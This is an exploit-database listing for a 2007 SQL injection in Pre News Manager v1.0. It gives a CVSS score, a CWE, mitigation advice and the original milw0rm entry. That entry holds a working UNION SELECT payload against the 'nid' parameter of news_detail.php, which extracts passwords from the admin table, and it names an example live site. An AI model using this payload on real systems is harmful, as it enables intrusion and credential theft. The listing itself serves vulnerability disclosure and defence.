header-logo
Suggest Exploit
vendor:
News Manager
by:
Unknown
6.5
CVSS
MEDIUM
Remote SQL Injection
89
CWE
Product Name: News Manager
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Pre News Manager v1.0 Remote SQL Injection

The vulnerability allows an attacker to execute arbitrary SQL queries in the database by manipulating the 'nid' parameter in the 'news_detail.php' script. By injecting SQL code, an attacker can retrieve sensitive information such as passwords from the 'admin' table.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, the use of prepared statements or parameterized queries can prevent SQL injection attacks.
Source

Exploit-DB raw data:

==============================================

Pre News Manager v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Script site: http://www.preproject.com/news.asp

==============================================

Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*

==============================================

Example: http://www.preproject.com/news%20manager/

==============================================

# milw0rm.com [2007-05-03]

Navigation

Suggest Exploit

Services By CQR